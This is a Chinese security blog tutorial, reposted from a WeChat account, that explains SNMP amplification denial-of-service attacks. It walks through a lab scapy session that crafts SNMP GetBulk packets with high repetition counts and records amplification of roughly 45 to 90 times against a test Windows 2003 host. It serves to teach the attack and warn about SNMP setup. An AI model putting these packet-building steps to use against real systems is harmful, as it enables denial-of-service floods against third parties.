拒绝服务——SNMP 放大攻击

admin 2022年11月9日00:24:37安全百科评论6 views1331字阅读4分26秒阅读模式


拒绝服务——SNMP 放大攻击



前言

本节学习SNMP 放大攻击

1、简介

SNMP(Simmple Network Management Protocol)

  • 通过一台客户端机器向一个被管理的设备发出查询请求获取这台设备当前运行状态的检测等情况

  • 服务端口UDP:(被监控设备)端口UDP 161为主动查询请求;162端口为监控方在固定时间内受监控端向监控端自动发送查询请求。

  • 管理站(manager/客户端)、被管理设备(agent/服务端)

  • 管理信息数据库(MIB) 是一个信息存储库,包含管理代理中的有关配置和性能的数据,按照不同分类,包含分属不同组的多个数据对象

  • 每一个节点都有一个对象标识符(OID) 来唯一的标识一IETF定义便准的MIB库厂家自定义MIB库

攻击原理

  • 请求流量小,查询结果返回流量大

  • 结合伪造源地址实现攻击

2、尝试攻击

SNMP服务器win2003

安装SNMP
配置community为只读
IP:192.168.1.124

客户端kali

IP:192.168.1.116

scapy>>> i=IP() #构造 IP 数据包>>> i.dst="192.168.1.124">>> i.display()>>> u=UDP() #构造 UDP 数据包>>> u.dport=161>>> u.sport=161>>> s=SNMP() #构造 SNMP 数据包>>> s.display()>>> b=SNMPbulk() #设置放大倍数>>> b.max_repetitions=100 #重复次数,即倍数>>> b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))] #要查的内容>>> b.display()>>> s.display()>>> s.PDU=b #设置 SNMP 数据包>>> s.display()>>> r=(i/u/s) #合成完整数据包>>> r.display()>>> sr1(r) #发送数据包#发送 98 字节,返回 4534 字节的数据包#测试放大200倍效果>>> b.max_repetitions=200>>> s.PDU=b>>> s.display()>>> r=(i/u/s)>>> r.display()>>> sr1(r)#发送 99 字节,返回 8894 字节

可类似之前写个脚本进行攻击

结语

为设置SNMP时敲响警钟
需要注意哪些东西

可参考
https://blog.csdn.net/Jack0610/article/details/88690365
https://blog.csdn.net/shangcx/article/details/71487274











   红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。


© Honker Security Commando


原文始发于微信公众号(中龙 红客突击队):拒绝服务——SNMP 放大攻击

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月9日00:24:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  拒绝服务——SNMP 放大攻击 http://cn-sec.com/archives/1397854.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: